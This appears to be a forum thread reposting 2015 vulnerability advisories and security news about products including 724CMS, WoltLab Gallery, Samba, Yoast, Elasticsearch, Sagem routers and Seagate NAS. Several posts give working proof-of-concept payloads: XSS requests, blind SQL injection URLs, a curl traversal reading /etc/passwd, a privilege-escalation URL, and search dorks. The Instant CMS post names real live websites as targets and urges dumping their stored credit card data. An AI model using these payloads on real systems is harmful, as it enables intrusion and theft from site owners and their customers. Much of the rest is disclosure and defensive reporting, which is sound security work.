http://www.tetraph.com/wangjing/ https://twitter.com/tetraphibious 724CMS 5.01 / 4.59 / 4.01 / 3.01 Cross Site Scripting *724CMS 5.01 Multiple XSS (Cross-site Scripting) Security Vulnerabilities* Exploit Title: 724CMS Multiple XSS (Cross-site Scripting) Security Vulnerabilities Vendor: 724CMS Product: 724CMS Vulnerable Versions: 3.01 4.01 4.59 5.01 Tested Version: 5.01 Advisory Publication: March 15, 2015 Latest Update: March 15, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend) Impact Subscore: 2.9 Exploitability Subscore: 8.6 Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore] *Recommendation Details:* *(1) Vendor & Product Description:* *Vendor:* 724CMS Enterprise *Product & Vulnerable Versions:* 724CMS 3.01 4.01 4.59 5.01 *Vendor URL & download:* 724CMS can be purchased from here, http://724cms.com/ *Product Introduction Overview:* "724CMS is a content management system (CMS) that has customers spread in Canada, Japan, Korean, the United States, European and many others. It allows publishing, editing and modifying content, organizing, deleting as well as maintenance from a central interface. Meanwhile, 724CMS provides procedures to manage workflow in a collaborative environment." "A CMS helps you create and store content in a shared repository. It then manages the relationships between content items for you (e.g. keeping track of where they fit into the site hierarchy). Finally, it ensures that each content item is connected to the right style sheet when it comes to be published. Some CMSs also provide facilities to track the status of content items through editorial processes and workflows." *(2) Vulnerability Details:* 724CMS web application has a security bug problem. It can be exploited by XSS attacks. This may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. Several 724CMS products vulnerabilities have been found by some other bug hunter researchers before. 724CMS has patched some of them. The MITRE Corporation is a not-for-profit company that operates multiple federally funded research and development centers (FFRDCs), which provide innovative, practical solutions for some of our nation's most critical challenges in defense and intelligence, aviation, civil systems, homeland security, the judiciary, healthcare, and cybersecurity. It has published suggestions, advisories, solutions details related to 724CMS vulnerabilities. *(2.1)* The first code programming flaw occurs at "/index.php" page with "&Lang" parameter. *(2.2) *The second code programming occurs at "/section.php" page with "&Lang", "&ID", "&Nav" parameters. *References:* http://www.tetraph.com/security/xss-vulnerability/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/03/724cms-501-multiple-xss-cross-site.html http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/ https://computertechhut.wordpress.com/2015/03/14/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/ http://marc.info/?l=full-disclosure&m=142576259903051&w=4 https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01737.html http://en.hackdig.com/?16117.htm -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/tetraphibious
  9. #Vulnerability title: Community Gallery - Srored Corss-Site Scripting vulnerability #Product: Community Gallery #Vendor: https://www.woltlab.com #Affected version: Community Gallery 2.0 before 12/10/2014 #Download link: https://www.woltlab.com/purchase/?products[]=com.woltlab.gallery #Fixed version: Community Gallery 2.0 after 12/26/2014 #CVE ID: CVE-2015-2275 #Author: Pham Kien Cuong (cuong.k.pham@itas.vn) & ITAS Team (www.itas.vn) ::PROOF OF CONCEPT:: + REQUEST: POST /7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad7553c0f885e3ccb60edbc0b6512 d9eed HTTP/1.1 Host: target User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://target/7788bdbc/gallery/index.php/ImageEdit/7/ Content-Length: 1300 Cookie: wcf_cookieHash=f774ed47049756db7f6f635748b497cf08b6fef3; __cfduid=dceb0da13e569549c9531d07b3d287acb1420598620 Authorization: Basic Nzc4OGJkYmM6OWM1NWE3OWM= Connection: keep-alive Pragma: no-cache Cache-Control: no-cache actionName=saveImageData&className=gallery%5Cdata%5Cimage%5CImageAction&obje ctIDs%5B%5D=7&parameters%5Bdata%5D%5B7%5D%5BalbumID%5D=1&parameters%5Bdata%5 D%5B7%5D%5BcategoryIDs%5D%5B%5D=3&parameters%5Bdata%5D%5B7%5D%5Bdescription% 5D=test&parameters%5Bdata%5D%5B7%5D%5BenableComments%5D=1&parameters%5Bdata% 5D%5B7%5D%5Bfilename%5D=HoaMai1.jpg&parameters%5Bdata%5D%5B7%5D%5Bfilesize%5 D=47948&parameters%5Bdata%5D%5B7%5D%5Bheight%5D=480&parameters%5Bdata%5D%5B7 %5D%5BimageID%5D=7&parameters%5Bdata%5D%5B7%5D%5Blatitude%5D=0&parameters%5B data%5D%5B7%5D%5Blongitude%5D=0&parameters%5Bdata%5D%5B7%5D%5Borientation%5D =1&parameters%5Bdata%5D%5B7%5D%5Btags%5D%5B%5D=testing&parameters%5Bdata%5D% 5B7%5D%5BthumbnailHeight%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailWidth%5 D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailX%5D=0&parameters%5Bdata%5D%5B7%5 D%5BthumbnailY%5D=0&parameters%5Bdata%5D%5B7%5D%5BtinyURL%5D=http%3A%2F%2Fde mo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e-tiny.jpg& parameters%5Bdata%5D%5B7%5D%5Btitle%5D=%3Cscript%3Ealert('XSS')%3C%2Fscript% 3E&parameters%5Bdata%5D%5B7%5D%5Burl%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788 bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e.jpg&parameters%5Bdata%5D%5B7%5 D%5Bwidth%5D=640&parameters%5Bdata%5D%5B7%5D%5Blocation%5D=&parameters%5BisE dit%5D=1 - Vulnerable parameter: parameters[data][7][title] ::DISCLOSURE:: + 12/10/2014: Detect vulnerability + 12/10/2014: Send the detail vulnerability to vendor + 03/11/2015: Public information ::REFERENCE:: - http://www.itas.vn/news/itas-team-found-out-a-stored-xss-vulnerability-in-bu rning-board-community-gallery-77.html ::DISCLAIMER:: THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK. -------------------------------------------- ITAS Team (www.itas.vn) Source
  10. Samba Remote Code Execution Vulnerability – CVE-2015-0240 The Samba team reported CVE-2015-0240 last February 23, 2015. This vulnerability is very difficult to exploit and we are not aware of successful exploitation. However, it is quite interesting from the point for view of detection. There are two important facts: The vulnerability resides in the Netlogon Remote Protocol implementation of Samba which is a very high-level application protocol that can be used over different transports configurations. To execute the vulnerable code the attacker doesn’t need be authenticated and can use many ways to launch the attacks because of the previous point. This is very motivating for attackers as they can find ways to bypass Intrusion Prevention System (IPS). There is a very good public description about the vulnerability, which can be found at this link. In this post, we will discuss it from the point of view of involved protocols and possible attack surfaces. Vulnerability description The vulnerability resides in the Netlogon Remote Protocol implementation of Samba, specifically in the method NetrServerPasswordSet. The Netlogon Remote Protocol was implemented for interoperability with Microsoft Windows environments and for simulating Primary Domain Controllers. Using the Netlogon Remote Protocol Windows and Linux machines can be part of the Samba PDC domain even without the use of Active Directory. The method NetrServerPasswordSet is used to change the machine account password in a Samba domain. The method NetrServerPasswordSet is implemented in _netr_ServerPasswordSet() in the source file samba\source3\rpc_server\netlogon\srv_netlog_nt.c. The “creds” pointer is passed into netr_creds_server_step_check() without initialization. The following figure shows the vulnerable code section: Figure 1. Vulnerable code section The triggering conditions can be different for Samba v3 and Samba v4 as pointed in this analysis. The attacker can control “computer_name” and “credentials” to reach the vulnerable code section making this vulnerability as possibly exploitable. There is a public POC triggering the vulnerable code. Running this POC and doing dynamic analysis shows that effectively the method _netr_ServerPasswordSet is called. The following figure shows the resumed call graph of Samba. Figure 2. Call graph of Samba Running Samba with high level debugging can allow us to get more runtime information. Example of a command: smbd –D –S /etc/samba/smb.conf -d 10 The following figure shows a section of the resulting log after running the POC. After some more lines we got: This error message is logged by the function schannel_fetch_session_key_tdb and returns the error with NT_STATUS_OBJECT_NAME_NOT_FOUND. This function is called by shannel_check_creds_state. Figure 4. The error NT_STATUS_OBJECT_NAME_NOT_FOUND The error NT_STATUS_OBJECT_NAME_NOT_FOUND will force _netr_ServerPasswordSet to free the “creds” pointer. Looking at the network packets in the following figure we can see the Netlogon Protocol using the transport RPC over SMB. Figure 5. Netlogon Protocol using the transport RPC over SMB And this is one important point regarding to the attack detection. The Netlogon protocol is a high-level application protocol and can use two transport types: RPC over SMB and RPC over TCP/IP. The next section discusses more about this topic. Attack Delivery Mechanisms The Netlogon Remote Protocol is a very high level application protocol that can run on different protocol stack configurations. The following figure shows it. Figure 6. Netlogon Protocol runs on different protocol stack configurations Figure 6 shows that theoretically, an attacker can use two stack configurations to reach the vulnerable code. They are: RPC over TCP/IP and RPC over SMB. These two configurations will use different network ports and communication mechanisms. This is a panacea for implementing attacks bypassing IPS. But even more interesting is the case over SMB where the NetrServerPasswordSet can be called using several SMB commands and at the same time the parameters to the method can be encrypted and unencrypted. The following figure shows other ways to call NetrServerPasswordSet. Figure 7. Other ways to call NetrServerPasswordSet Conclusion The vulnerability it is not easy to exploit and we are not aware of public exploits until now. However, the attack can be implemented in many different ways and the fact that it is not required to be authenticated makes it easy for the attackers. Implementing the protection requires coverage of multiple protocol stack configurations and multi commands over SMB. Sursa: Samba Remote Code Execution Vulnerability – CVE-2015-0240
  11. A critical vulnerability has been discovered in the most popular plugin of the WordPress content management platform (CMS) that puts tens of Millions of websites at risks of being hacked by the attackers. The vulnerability actually resides in most versions of a WordPress plugin known as ‘WordPress SEO by Yoast,’ which has more than 14 Million downloads according to Yoast website, making it one of the most popular plugins of WordPress for easily optimizing websites for search engines i.e Search engine optimization (SEO). The vulnerability in WordPress SEO by Yoast has been discovered by Ryan Dewhurst, developer of the WordPress vulnerability scanner ‘WPScan’. All the versions prior to 1.7.3.3 of ‘WordPress SEO by Yoast’ are vulnerable to Blind SQL Injection web application flaw, according to an advisory published today. SQL injection (SQLi) vulnerabilities are ranked as critical one because it could cause a database breach and lead to confidential information leakage. Basically in SQLi attack, an attacker inserts a malformed SQL query into an application via client-side input. HOW YOAST VULNERABILITY WORKS However, in this scenario, an outside hacker can’t trigger this vulnerability itself because the flaw actually resides in the 'admin/class-bulk-editor-list-table.php' file, which is authorized to be accessed by WordPress Admin, Editor or Author privileged users only. Therefore, in order to successfully exploit this vulnerability, it is required to trigger the exploit from authorized users only. This can be achieved with the help of social engineering, where an attacker can trick authorized user to click on a specially crafted payload exploitable URL. If the authorized WordPress user falls victim to the attack, this could allow the exploit to execute arbitrary SQL queries on the victim WordPress web site, Ryan explained to security blogger Graham Cluley. Ryan also released a proof-of-concept payload of Blind SQL Injection vulnerability in ‘WordPress SEO by Yoast’, which is as follows: http://victim-wordpress-website.com/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc PATCH FOR YOAST SQLi VULNERABILITY However, the vulnerability has reportedly been patched in the latest version of WordPress SEO by Yoast (1.7.4) by Yoast WordPress plugin developers, and change log mentions that latest version has "fixed possible CSRF and blind SQL injection vulnerabilities in bulk editor." Generally, it has been believed that if you have not installed WordPress Yoast for SEO, then your WordPress website is seriously incomplete. The vulnerability is really serious for website owners who wish to increase their search engine traffic by using this plugin. Therefore, WordPress administrators with disabled Auto-update feature are recommended to upgrade their WordPress SEO by Yoast plugin as soon as possible or they can manually download the latest version from WordPress plugin repository. If you have installed WordPress 3.7 version and above, then you can enable fully automate updating of your plugins and themes from Manage > Plugins & Themes > Auto Updates tab.
  12. ========================================================================================== Instant v2.0 SQL Injection Vulnerability ========================================================================================== :-------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : Instant v2.0 SQL Injection Vulnerability : # Date : 10th March 2015 : # Author : X-Cisadane : # CMS Name : Instant v2.0 (another OverCoffee production) : # CMS Developer : overcoffee.com : # Version : 2.0 : # Category : Web Applications : # Vulnerability : SQL Injection : # Tested On : Google Chrome Version 40.0.2214.115 m (Windows 7), Havij 1.16 Pro & SQLMap 1.0-dev-nongit-20150125 : # Greetz to : Explore Crew, CodeNesia, Bogor Hackers Community, Ngobas and Winda Utari :-------------------------------------------------------------------------------------------------------------------------: A SQL Injection Vulnerability has been discovered in the Instant v.2.0 CMS. The Vulnerability is located in the subid Value of the product_cat.php File. Attackers are able to execute own SQL commands by usage of a GET Method Request with manipulated subid Value. Attackers are able to read Database information by execution of own SQL commands. DORKS (How to find the target) : ================================ "Powered By Instant" inurl:/catalog/ inurl:/product_cat.php?subid= Or use your own Google Dorks Proof of Concept ================ SQL Injection PoC : http://[Site]/[Path]/product_cat.php/subid=['SQLi] And you have to change the URL structure to http://[Site]/[Path]/product_cat.php?subid=['SQLi] Example : http://www.cynthiawebbdesigns.com/catalog/product_cat.php/subid=16617/index.html?PHPSESSID=3ef7e156add41316201ffe87bd489a7d Just change the URL structure to http://www.cynthiawebbdesigns.com/catalog/product_cat.php?subid='16617 And you'll see this error notice : You have an error in your SQL syntax; check the manual that corresponds to your MySQL ... Note : This CMS stored Credit Card Infos on the Database, just open your Fav Tool and Dump the orders Table PIC / PoC : http://i59.tinypic.com/4l0poh.png Another Vuln Sites : http://www.unitymarketingonline.com/catalog/product_cat.php?subid=['SQLi] http://www.peacefulinspirations.net/catalog/product_cat.php?subid=['SQLi] http://www.dickensgifts.com/catalog/product_cat.php?subid=['SQLi] http://www.frogandprincellc.com/catalog/product_cat.php?subid=['SQLi] http://www.debrekht.com/catalog/product_cat.php?subid=['SQLi] ... etc ... Source
  13. Attackers are targeting a patched remote code execution vulnerability in Elasticsearch that grants unauthenticated bad guys access through a buggy API. The flaw (CVE-2015-1427) within the world's number two enterprise search engine was patched last month. It relates, for folks at Mitre say, to the Groovy scripting engine in Elasticsearch before versions 1.3.8 and 1.4.3 in which sandbox protections could be bypassed, allowing the execution of arbitrary shell commands with a crafted script. The fixes disable Groovy sandboxing and dynamic script execution which ElasticSearch developer Clinton Gormley says is a "blow" to Elasticsearch. Texas hacker Jordan Wright (@jw_sec) explained the vulnerability reported by Cisco and Elasticsearch security bod Cameron Morris after he was targeted in attacks. In a post written to alert fellow users he says the patch could be reversed to find hints about how to exploit the flaw. "This vulnerability was not heavily advertised, but it is absolutely critical," Wright says. "In fact, I had one of my own Elasticsearch instances compromised this way, showing this vulnerability is heavily being exploited in the wild. "I won’t provide a full proof-of-concept, but all the pieces are here ... it is pretty straightforward to run whatever commands you want." Developer David Davidson published overnight to GitHub what he says is a functioning proof of concept. There is a "tonne" of publicly-accessible Elasticsearch instances, Wright says. He recommends on Reddit that users check /tmp folders to ensure it is not accessible over the internet. "I've been seeing a ton of attempts to download skiddie DDoS bots via wget to /tmp in the past week or so," he says. Gormley says the company is in the long term examining ways to improve Expressions to become a more-powerful safe "mini-language". Source
  14. ------------------------------------------------------------------------------ WordPress Fraction Theme 1.1.1 Previlage Escalation ------------------------------------------------------------------------------ [-] Theme Link: http://themeforest.net/item/fraction-multipurpose-news-magazine-theme/8655281 [-] Affected Version: Version: 1.1.1 [-] Vulnerability Description: This vulnerability allows an attacker to escalate privileges on the site and have an admin account which may lead to a full site takeover the vulnerability is in /fraction-theme/functions/ajax.php there is this function called "ot_save_options": function ot_save_options() { $fields = $_REQUEST; foreach($fields as $key => $field) { if($key!="action") { update_option($key,$field); } } die(); } passing user input into the update_option function allows an attacker to update options like users_can_register,default_role.... etc this can be accessed via ajax by users and non-users: add_action('wp_ajax_nopriv_ot_save_options', 'ot_save_options'); add_action('wp_ajax_ot_save_options', 'ot_save_options'); [-] Proof of Concept: this will enable user registration http://localhost/wordpress/wp-admin/admin-ajax.php?action=ot_save_options&users_can_register=1 [-] Timeline: 09 March - Vendor Notified 09 March - Vendor Replied 10 March - Fix Released 10 March - Public Disclosure [-] References: http://research.evex.pw/?vuln=8 @evex_1337 Source
  15. Seagate, over the weekend, confirmed the zero-day vulnerability in its Seagate Business Storage 2-Bay NAS boxes disclosed March 1. But in the same breath, told customers exposed to the vulnerability that a patch is still two months away. “For those customers who choose to keep their networks open, Seagate will be issuing a software patch for download expected May 2015,” said a statement emailed to Threatpost. Seagate said that after analyzing the vulnerability, it has determined the zero-day to be low risk because it affects only those customers to expose the NAS boxes to the Internet. “With factory settings, Business NAS products are not vulnerable. The user has to intentionally change a default setting to become susceptible,” Seagate said. Seagate has built a website for concerned customers with instructions on how to mitigate exposure, and encouraged users to put the NAS boxes behind a firewall when using them exclusively on internal networks. The vulnerability was publicly disclosed a week ago Sunday by Australian security consultancy Beyond Binary after five months of dialogue with Seagate that failed to produce a security update for the firmware issue in question, the researchers said. Beyond Binary said it used a Shodan scan to find 2,500 vulnerable devices exposed to the Internet. Beyond Binary said Seagate boxes running firmware version up to and including 2014.00319 are vulnerable and exploitable without authorization. The issue stems from a number of outdated components upon which the NAS products’ web-based management application is built. The app is used to manage files, access control and user accounts. The outdated components include versions of PHP and Lighttpd from 2010 and a version of CodeIgniter from late 2011; all of which have their own set of vulnerabilities that have been addressed in later versions of the respective components. Hackers can abuse each of these to lace the code with additional files and executables, or extract an encryption key to open up new avenues of attack, Beyond Binary said. The custom web app is not without its issues too as it stores information relevant to a user session inside a session cookie rather than on the webserver. Some of those values include the name of the user, whether they’re an admin and the language. “The fact that a static session encryption key is in use across all instances of the NAS means that once a user has a valid session cookie on one instance, they can apply that same cookie directly to another instance and acquire the same level of access,” the advisory said. “In short, once a user is logged in as admin on one instance, they’re effectively admin on every instance.” Source
  16. # Title : Sagem F@st 3304-V2 Directory Traversal Vulnerability # Vendor : http://www.sagemcom.com # Severity : High # Tested Router : Sagem F@st 3304-V2 (3304, other versions may also be affected) # Date : 2015-03-01 # Author : Loudiyi Mohamed # Contact : Loudiyi.2010@gmail.com # Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603 # Vulnerability description: Sagem Fast is an ADSL Router using a web management interface in order to change configuration settings. The router is Sagem Fast is an ADSL Router using a web management interface in order to change configuration settings. The web server of the router is vulnerable to directory traversal which allows reading files by sending encoded '../' requests. The vulnerability may be tested with the following command-line: curl -v4 http://192.168.1.1//../../../../../../../../../../etc/passwd Or directly from navigateur: http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fnet%2farp Source
  17. Attackers behind the Angler Exploit Kit have added a tweaked version of an exploit for a patched Internet Explorer use-after-free vulnerability. Microsoft patched the vulnerability (MS14-056) in last October’s round of Patch Tuesday updates but that hasn’t stopped attackers from adding the vulnerability to the exploit toolkit. Similar to exploits disclosed in October, the sample Angler is using has been modified to bypass IE’s mitigation technology MEMPROTECT. According to Dan Caselden, a ?staff research scientist at FireEye who blogged on Friday about the vulnerability being included in Angler , this one is a use after free with MSHTML!CTitleElement that MEMPROTECT was not originally supposed to mitigate. Caselden claims the attack angle is interesting on its own because it focuses on IE deployments that use MEMPROTECT – introduced in July 2014 – but added that the vulnerability also cements the idea that attackers remain interested in compromising IE, especially against users running nearly five-month-old versions of it. Still, the use after free is not a generic exploit – some of its techniques weren’t necessary, Caselden adds – and going forward attackers will still have to find their way around the MEMPROTECT technology. “Some of the employed techniques (particularly the modified garbage collection routine) were not necessary,” Caselden wrote, “So in the future, exploit authors will need to find a reliable way around the delayed free, or bugs with another object that falls outside of the CMemoryProtector’s domain.” Chinese researchers with Keen team (a/k/a k33nteam) first talked about how (.PDF) to exploit a use after free vulnerability against MEMPROTECT at the Taiwanese security conference Hitcon X over the summer and went describe how it bypasses memory protection and isolated heap in Windows 8.1 shortly after the bug was patched by Microsoft, in a blog entry last October. Caselden gets much deeper into the exploit and points out the similarities from k33nteam’s proof of concept and the Angler sample on FireEye’s blog. For example, unlike the October exploit, this one can also optionally serve up a Flash zero day (CVE-2015-0313) – one of the three that plagued the Adobe software last month – that was also previously seen being used by Angler. Microsoft introduced MEMPROTECT, or MemoryProtection, in a July 2014 patch for IE and while the heap mitigation technology isn’t failsafe, it was thought to be effective against use after free vulnerabilities. For a short period it seemed as if the move would curb the number of IE exploits spotted in the wild, as attackers wouldn’t have to reuse dated IE use after free exploits. Naturally attackers were able to come up with ways around this. Attackers that have long had it out for Microsoft’s Internet Explorer and continue to take old, since-patched exploits and add them to their exploit kits just to see what sticks. In January attackers added a nasty, previously unknown Flash zero day that targeted IE on Windows 7 and 8 to the kit. An analysis of Angler last month called it the most sophisticated kit on the market, namely because it’s been the fastest to integrate newly released zero days and because its obfuscation is reportedly at the top of its game. Source
  18. Document Title: =============== Data Source: Scopus CMS - SQL Injection Web Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1436 Release Date: ============= 2015-02-25 Vulnerability Laboratory ID (VL-ID): ==================================== 1436 Common Vulnerability Scoring System: ==================================== 8.9 Abstract Advisory Information: ============================== An independent security team of the vulnerability laboratory discovered a critical sql injection web vulnerability in the official Data Source Scopus Content Management System. Vulnerability Disclosure Timeline: ================================== 2015-02-25: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Critical Technical Details & Description: ================================ A remote sql injection web vulnerability has been discovered in the official Data Source Scopus Content Management System. The vulnerability allows remote attacker to inject own sql commands to compromise the affected database management system. The vulnerability is located in the `w` value of the `countrysearch.php` file. Remote attackers are able to compromise the application & dbms by manipulation of the `w` value in the `countrysearch.php` file. The issue is a classic order by injection. The request method to inject own commands is GET and the issue is located on the applicaiton-side of the service. The security risk of the sql injection vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.9. Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the remote sql injection results in dbms, web-server and web-application compromise. Request Method(s): [+] GET Vulnerable File(s): [+] countrysearch.php Vulnerable Parameter(s): [+] w Proof of Concept (PoC): ======================= The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: Example http://[localhost]/[PATH]/[FILE].php?w=-[SQL INJECCTION VULNERABILITY]'-- PoC: Demonstration http://www.server.com/countrysearch.php?w=world%27-[SQL INJECCTION VULNERABILITY]'-- Dork(s): inurl:".php?w=" Solution - Fix & Patch: ======================= The vulnerability can be patched by usage of the preapred statement in connection with a secure encode/parse of the w value in the countrysearch.php file. Restrict the w value input and filter by disallowing input of special chars or negative values. Disable php script error(0);! Security Risk: ============== The security risk of the remote sql injection web vulnerability in the countrysearch.php file is estimated as critical. Credits & Authors: ================== [GuardIran Security Team] P0!s0nC0d3 - (http://www.guardiran.org) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
  19. Seagate, a popular vendor of hardware solutions, has a critical zero-day vulnerability in its Network Attached Storage (NAS) device software that possibly left thousands of its users vulnerable to hackers. Seagate's Business Storage 2-Bay NAS product, found in home and business networks, is vulnerable to a zero-day Remote Code Execution vulnerability, currently affecting more than 2,500 publicly exposed devices on the Internet. Seagate is one of the world’s largest vendor of hardware solutions, with products available worldwide. After Western Digital, Seagate ranked second and holds 41% of the market worldwide in supplying storage hardware products. A security researcher, named OJ Reeves, discovered the zero-day remote code execution vulnerability on 7th October last year and, reported to the company totally in the white hat style. But even after 130 days of responsible disclosure, the zero-day bug remains unpatched till now. In order to exploit the vulnerability, an attacker needs to be on the same network as the vulnerable device which gives the attacker root access of the vulnerable device, without the need of a valid login. Reeves also released a python exploit along with its Metasploit module version which is available on Github. ORIGIN OF ZERO-DAY VULNERABILITY Seagate's Business Storage 2-Bay NAS products come with a web-enabled management application that lets administrators to perform device configuration functions such as adding users, setting up access control, managing files, and more. This web application is built with three core technologies, including PHP version 5.2.13, CodeIgniter version 2.1.0 and Lighttpd version 1.4.28, which are all out-dated versions. PHP version 5.2.13 is vulnerable (CVE-2006-7243) that allows user-controlled data to prematurely terminate file paths, allowing for full control over the file extension. CodeIgniter version prior to 2.2.0 is vulnerable (CVE-2014-8686) that allows an attacker to extract the encryption key and decrypt the content of the cookie. Once decrypted, attacker can modify the content of the cookie and re-encrypt it prior to submitting it back to the server. The custom web application authenticate the login user based upon browser cookies, having three parameters: username: logged in user name is_admin: user is admin or not i.e. Yes or No language: chosen language (eg. en_US) Researcher explained that there is no further validation of user credentials at server-end, once username cookie is established, which could be impersonated easily by an attacker. Another parameter 'is_admin' can be manipulated to 'Yes' value that allows the attacker to self-elevate to administrative privileges in the web application itself. The language parameter can be manipulated for exploitation of a local file inclusion vulnerability. At last, the web application is being executed by an instance of Lighttpd which is running under the context of the root user. When an attacker makes a request with the manipulated cookie, it results in arbitrary code execution as root user. Therefore, successful exploitation of this vulnerability could result in taking complete control of the vulnerable device as a root user. VULNERABLE PRODUCTS Two different network storage devices made by Seagate were tested and found to be vulnerable. The latest Seagate NAS firmware version listed below are affected by this zero-day vulnerability: Business Storage 2-Bay NAS version 2014.00319 Business Storage 2-Bay NAS version 2013.60311 However, Reeves believes that all versions of Business Storage 2-Bay NAS product prior to 2014.00319 are affected by the same vulnerability. METASPLOIT MODULE AVAILABLE A Metasploit module and a Python script to exploit the vulnerability automatically is available on the Github. Each of these scripts are able to perform the following tasks: Connects to the vulnerable NAS device and extracts a ci_session cookie. Decrypts the cookie using the static encryption key and extracts the PHP hash. Modifies the serialized PHP hash so that the username is set to 'admin' and the is_admin field is set to 'yes'. Encrypts this updated PHP hash ready for further use as a ci_session cookie, which allows future requests to operate on the NAS as if they were an administrator. Performs a request to extract the host configuration, which includes the device's description. Modifies the host configuration so that the device description contains a small stager payload. Performs a request to update the host configuration with the new data so that the stager payload is written to /etc/devicedesc. Modifies the PHP hash again so that the language parameter contains the value ../../../../etc/devicedesc\x00. Encrypts this new PHP hash ready for future use as a ci_session cookie. Performs a request to the NAS using the cookie created in the previous step, which invokes the stager that was written to disk. This request posts a larger payload which is written to disk under the web server root. Performs another request which then resets the host configuration back to what it was prior to exploitation. According to Reeves, there was no updated firmware version available for download that contains patches for the issues, even after contacting the company multiple times. Users of Seagate's Business Storage NAS products and and other products using vulnerable firmware are recommended to ensure that their devices are not accessible via the public Internet and that the devices be located behind a firewall configured to allow only a trusted set of IP addresses to connect to the web interface. Source
